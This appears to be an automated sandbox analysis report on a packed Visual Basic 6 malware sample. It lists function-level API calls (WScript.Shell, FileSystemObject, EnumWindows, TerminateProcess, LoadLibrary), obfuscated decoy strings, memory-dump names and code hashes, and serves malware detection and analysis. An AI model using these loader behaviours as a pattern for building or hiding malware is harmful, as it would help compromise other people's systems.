__vbaStrVarVal.MSVBVM60(?,?,000000A1,00000002,?,00000002), ref: 004209A6
#628.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209AC
__vbaStrMove.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209B6
__vbaFreeStr.MSVBVM60(00000000,?,?,000000A1,00000002,?,00000002), ref: 004209BE
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,00000002,00000000,?,?,000000A1,00000002,?,00000002), ref: 004209D1
__vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,00000009,00000000,?,?,?,00401546), ref: 004209F3
#564.MSVBVM60(00000004,?), ref: 00420AC7
__vbaHresultCheck.MSVBVM60(00000000), ref: 00420AE1
__vbaI4Var.MSVBVM60(?), ref: 00420AF9
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?), ref: 00420B1A
__vbaOnError.MSVBVM60(000000FF), ref: 00420BB0
__vbaStrI4.MSVBVM60(003ED0FD,000000FF), ref: 00420BC1
__vbaStrMove.MSVBVM60(003ED0FD,000000FF), ref: 00420BCB
#578.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420BD1
__vbaFreeStr.MSVBVM60(00000000,003ED0FD,000000FF), ref: 00420BDC
__vbaAryDestruct.MSVBVM60(00000000,?,00420C28), ref: 00420C1A
__vbaFreeStr.MSVBVM60(00000000,?,00420C28), ref: 00420C22

Strings

FOSTERET, xrefs: 004207E3

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$Chkstk$#518#564#573#575#578#628DestructErrorNew2Redim
String ID: FOSTERET
API String ID: 53557705-1574993597
Opcode ID: 0890c9e809bcba8642060cf1f6caa0165c5b5b78d3c7a37c562a37d4fd51ebc9
Instruction ID: 0a74493fcb3b3f3581d043cebca2ef6a7ffca69fdbafcbed18917615b5d4a0b9
Opcode Fuzzy Hash: 0890c9e809bcba8642060cf1f6caa0165c5b5b78d3c7a37c562a37d4fd51ebc9
Instruction Fuzzy Hash: 18D1F9B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB4D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EB68
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EB80
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EB90
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EB99
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EBA3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041EBAB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041EBCC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041EBE8
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041EBF5
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041EC01
#697.MSVBVM60(000009AE,?,00000000), ref: 0041EC13
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041EC1D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041EC2C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041EC36
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC58
__vbaFreeObj.MSVBVM60(0041EC76,?,00000000), ref: 0041EC60
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC68
__vbaFreeStr.MSVBVM60(0041EC76,?,00000000), ref: 0041EC70

Strings

Desorganisationens, xrefs: 0041EC27
Gulsoterne, xrefs: 0041EBB0
Propreste7, xrefs: 0041EC22
FolderExists, xrefs: 0041EBDC
Scripting.FileSystemObject, xrefs: 0041EB87

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 9d008f0baa8c66aeb9fb300bc59f48f05a7363c37ee1349b110dc43dbf328600
Instruction ID: eb56394621d30b47d1e7f0c1fe64527459e02528fbb533b5cfa1a86cf3aef07b
Opcode Fuzzy Hash: 9d008f0baa8c66aeb9fb300bc59f48f05a7363c37ee1349b110dc43dbf328600
Instruction Fuzzy Hash: C4312B71910218ABDB14EBA2CD86FEE7778AF11708F60453FB101770E2EBBD5A458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042142C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421448
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421475
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042148C
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00421491
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004214AA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214C1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214CA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214D4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004214DC
__vbaFreeStr.MSVBVM60(00421503,?,?,?,?,?,?,00401546), ref: 004214F5
__vbaFreeObj.MSVBVM60(00421503,?,?,?,?,?,?,00401546), ref: 004214FD

Strings

WScript.Shell, xrefs: 004214B8

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: a8f43f8d449fea691a2801efe6c89318294af06d3ecf90b1915a406576d64272
Instruction ID: 7982085fe91bb987341f93e765445301efc6d1d96112fe3bd4a9835da013b008
Opcode Fuzzy Hash: a8f43f8d449fea691a2801efe6c89318294af06d3ecf90b1915a406576d64272
Instruction Fuzzy Hash: E4110DB1900208BBDB10EFA1DD46BDEBBB8AB44708F50456EF101761E1DBBD5A448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00421516, Relevance: 15.1, APIs: 10, Instructions: 102COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421531
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042154A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402310,00000058), ref: 00421576
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00421591
#644.MSVBVM60(?,?,?), ref: 0042159A
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004215AB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004215EA
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004215FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402310,000002B0), ref: 00421632
__vbaFreeObj.MSVBVM60(00421659), ref: 00421653

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 08cb90e36ea02506d91524a46d753a20ddf52da15bd5bc5c572393c4554f65e0
Instruction ID: e07db963fa73634f9fc6910f5233b6cd176df257759dfbc213d863687aa02990
Opcode Fuzzy Hash: 08cb90e36ea02506d91524a46d753a20ddf52da15bd5bc5c572393c4554f65e0
Instruction Fuzzy Hash: A7415771900218AFCF01EF91CC46BDEBBB5FF14344F10042AF901BB1A1C7B999858B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 004019C8, 00401888

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: b344f4b4e4f0dcdb9195128bcd78988da101233f58435bb07ba9a2fdbf2817d5
Instruction ID: c9fd10dba90da17dfd0b65ae3975065bc430cd2f57dc6279ad09ea6a8859824d
Opcode Fuzzy Hash: b344f4b4e4f0dcdb9195128bcd78988da101233f58435bb07ba9a2fdbf2817d5
Instruction Fuzzy Hash: FC41FDA144E3C05FD7038B748C762917FB0AE53204B1E90EBC8D1CF5A3D22C591AD7AA

Uniqueness

Uniqueness Score: -1.00%

Function 02283E87, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: 4934953194a55d873ce9355d0675084dbe72f34c6ce1695f9cac5155223d408d
Instruction ID: cc0b65c5c8320438fef56d0815252f3aede03509d85508472777723c8723fc07
Opcode Fuzzy Hash: 4934953194a55d873ce9355d0675084dbe72f34c6ce1695f9cac5155223d408d
Instruction Fuzzy Hash: CC31443051D6C1DAC723DA7884083EAFF60EF12314F1886DEC4954B1A6C776911AC752

Uniqueness

Uniqueness Score: -1.00%

Function 02283E65, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: cc9ed738baa393f45bcedf63d854a6043c81236317d265c0c32570126a79c6b0
Instruction ID: 77c3491115b04683bb71fcb58057d93cf31007dc9b8c227e5cc4c4c3530384d9
Opcode Fuzzy Hash: cc9ed738baa393f45bcedf63d854a6043c81236317d265c0c32570126a79c6b0
Instruction Fuzzy Hash: 0F21F47151D7C6DAC712CA7884087EABF60AF12304F1882DDD4848B1A6C7729115CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02283FA4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: 44050b7bd7a67e7897c800161cce0dce35f873dd4e30ba9dc1bde32c57eb38bd
Instruction ID: 20f6ea2319a35bbe59335bc5d06b49ccb0eedfa1db60acb618e078121eaa5a04
Opcode Fuzzy Hash: 44050b7bd7a67e7897c800161cce0dce35f873dd4e30ba9dc1bde32c57eb38bd
Instruction Fuzzy Hash: E70166715292C2EFD7169A38840A3D6FF70AF12304F6445AEC4C1CA192C7A2814ACB13

Uniqueness

Uniqueness Score: -1.00%

Function 02283E69, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 0228CF7F

Strings

/, xrefs: 0228CF5A

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: /
API String ID: 560597551-2043925204
Opcode ID: 15264da95f5f0445afc7e25e93b9ee560d346cb4ec342bcc0324bdc3266c286d
Instruction ID: 7214214d817c54b6ff02363ce027fe2ba7e1b3a6b912a67e88ca98433fe7dadc
Opcode Fuzzy Hash: 15264da95f5f0445afc7e25e93b9ee560d346cb4ec342bcc0324bdc3266c286d
Instruction Fuzzy Hash: B6F0E931121255EFCF246EB0D959BFA33B5AF02744F10041CE99A95525D7B6C144CF13

Uniqueness

Uniqueness Score: -1.00%

Function 02281695, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,?), ref: 02281786

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 7510a22cc3ec9ff85fddabb1961d48d91de93cd5710648a79f3b286b06032b50
Instruction ID: b971e164c07987d6f10fd40b924e41439eef690a156b99bb5a682a8aa5636d5a
Opcode Fuzzy Hash: 7510a22cc3ec9ff85fddabb1961d48d91de93cd5710648a79f3b286b06032b50
Instruction Fuzzy Hash: A6215B7154C2C9CFDB29DF68C8446EB7BE6EF48200F18466DD84D97A86C7309E55C741

Uniqueness

Uniqueness Score: -1.00%

Function 0228D31D, Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 0228D4B6

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1e401a65cb7c422c511e92e896074129276cb084ec1bd95d8f90b9f9d66ab4eb
Instruction ID: 768ffa01291c6b891637c57be636e91f3c80113ff707f7e099aa54502ced0e13
Opcode Fuzzy Hash: 1e401a65cb7c422c511e92e896074129276cb084ec1bd95d8f90b9f9d66ab4eb
Instruction Fuzzy Hash: 55118CB290C304DFCB586F29D92AAAEB7B1AF24310F82081ED8CA86244D3305981CF13

Uniqueness

Uniqueness Score: -1.00%

Function 02291E98, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f47c109acd28fbacbb40434f4e23901bd8925cf093c6760021c17744150300a
Instruction ID: 1e04721c5fb0bc19843a8b6d2571f8bb0386c7f0072abac9b3907efe7764b7c1
Opcode Fuzzy Hash: 0f47c109acd28fbacbb40434f4e23901bd8925cf093c6760021c17744150300a
Instruction Fuzzy Hash: 6A011670A80B9DEBDF749FA5C9A8BCA37A2EB98310F10815AED184A205D7304B44DB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 022949D1, Relevance: 3.0, Strings: 2, Instructions: 509COMMON

Download Yara Rule

Strings

9?B, xrefs: 02296089
k>7, xrefs: 022951E2

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: 9?B$k>7
API String ID: 3389902171-3335369649
Opcode ID: 5996d5e78f2b41fb726c56a478c6f676b78386948ce439f51ece195d3bbb1027
Instruction ID: c436ea7fc38b11d3ddcb89b2acbf983e042e40dbf9f5a21cdf2ef1d7cfce1347
Opcode Fuzzy Hash: 5996d5e78f2b41fb726c56a478c6f676b78386948ce439f51ece195d3bbb1027
Instruction Fuzzy Hash: AA22E5716183C58FDF31CF78C8987DABBE2AF56350F49829AC8998F29AD3748541C712

Uniqueness

Uniqueness Score: -1.00%

Function 022939E4, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c2fb808bbca96c27b3f58ca56f51039a3c29db1a1047deee3d701bf2e1de5a48
Instruction ID: bcb7bba7e2d0e6b72e18fc5f5525d114f18b33c9ceace15d8e72831097fe4560
Opcode Fuzzy Hash: c2fb808bbca96c27b3f58ca56f51039a3c29db1a1047deee3d701bf2e1de5a48
Instruction Fuzzy Hash: 9E9133729147869FDF34EEA5CC957DB73B2BF94340F15812ACC499B208D3709A82CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0228DFFD, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f782e637a140c563e8ca50d7c28df1e96baf3314f84fb66c1d15fe3c541825d9
Instruction ID: 3afccb76d58f24923e9a258e0f352d0c91ccc31013201fdcff443a6e15f67f6b
Opcode Fuzzy Hash: f782e637a140c563e8ca50d7c28df1e96baf3314f84fb66c1d15fe3c541825d9
Instruction Fuzzy Hash: 55A1AE71114289DFCB74AFA1CC51BEE37A6BF94340F06442DEC8AAB658D7309A41DF12

Uniqueness

Uniqueness Score: -1.00%

Function 02292A85, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea498976beb1cadff4748d87b423262a2cc732f9b346fc29ad2eabaa94caed6f
Instruction ID: 2ce6057fba849a9ac5aeb4969d036dabf03a5b2fbe056a6ff104f4964d8f0ebe
Opcode Fuzzy Hash: ea498976beb1cadff4748d87b423262a2cc732f9b346fc29ad2eabaa94caed6f
Instruction Fuzzy Hash: 0A01CC76620658DFCB34CF28C898FD973E2EFA4710F46059ADC089B214C774AE40CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0228CF89, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebdc862d74b4c5b8aeb6e9228852dd68de493c3fab228ca510d8ca756b6e446
Instruction ID: 4a13207abd2cca645004457e3e201ce3563417d1908bbfa4f42fbd95dd3f2f52
Opcode Fuzzy Hash: 9ebdc862d74b4c5b8aeb6e9228852dd68de493c3fab228ca510d8ca756b6e446
Instruction Fuzzy Hash: 9DC092B76019818FFF06CA0CC891B4073A1F715664B480AD0F022CB7E2E324ED01CA08

Uniqueness

Uniqueness Score: -1.00%

Function 02293692, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02291E86, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00420F4D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420F6B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F95
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FA0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FAB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FB6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420FC6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420FD0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00421011
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421035
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421044
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00421057
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421076
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421080
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 0042108F
__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00421099
#513.MSVBVM60(?,00000008,000000EA), ref: 004210C8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 004210D1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 004210DB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 004210E3
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 004210F2
__vbaVarDup.MSVBVM60 ref: 00421117
#542.MSVBVM60(?,?), ref: 00421124
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00421148
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0042115E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00421189
__vbaNew2.MSVBVM60(0040259C,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 004211A1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 00421203
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000110), ref: 0042125F
__vbaStrMove.MSVBVM60(00000000,?,004025AC,00000110), ref: 00421289
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000110), ref: 00421291
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042129E
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212EA
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212F2
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212FA
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 00421302

Strings

12/12/12, xrefs: 004210FA
RESELLS, xrefs: 00421184
Antagonistiske, xrefs: 0042117A
DIVARICATE, xrefs: 00421296
Sjkler7, xrefs: 00421175
Apokreos, xrefs: 0042108A
ADDEDLY, xrefs: 0042117F
monacanthid, xrefs: 00421016
Pollenate4, xrefs: 00421071

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: 9c19e45f961192f5f7bc2494ddfd9e4e83427c18c294af48723a9f3d1aeb726c
Instruction ID: d4a2817e9825debda5ef056418d1bad8ca9cad3fb0e65083fc5ad7ac659b483c
Opcode Fuzzy Hash: 9c19e45f961192f5f7bc2494ddfd9e4e83427c18c294af48723a9f3d1aeb726c
Instruction Fuzzy Hash: B7A1D671E00218AFDB10EF91D886BDEB7B8AF14304F5081AAF505B71A1EB785A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8EE, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F90B
__vbaVarDup.MSVBVM60 ref: 0041F93A
#667.MSVBVM60(?), ref: 0041F943
__vbaStrMove.MSVBVM60(?), ref: 0041F94D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F958
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F96F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F977
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F9A8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F9B5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F9BE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F9C8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F9D7
__vbaNew2.MSVBVM60(0040259C,004223C0), ref: 0041F9F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041FA54
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041FAAD
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041FACF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041FAFF
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB15
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB36
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB43
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB5D
__vbaVarDup.MSVBVM60 ref: 0041FB8D
#522.MSVBVM60(?,?), ref: 0041FB9A
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FBA3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FBAD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FBBC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041FBC9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041FBCF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041FBD9
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC1D
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC25
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC2D

Strings

galopbanernes, xrefs: 0041FBC4
Skovede1, xrefs: 0041FB70
Picry, xrefs: 0041F953
Langfredagene5, xrefs: 0041F98B
SUPERSERIOUS, xrefs: 0041FAE2
f, xrefs: 0041FBDE
appdata, xrefs: 0041F91D

Memory Dump Source

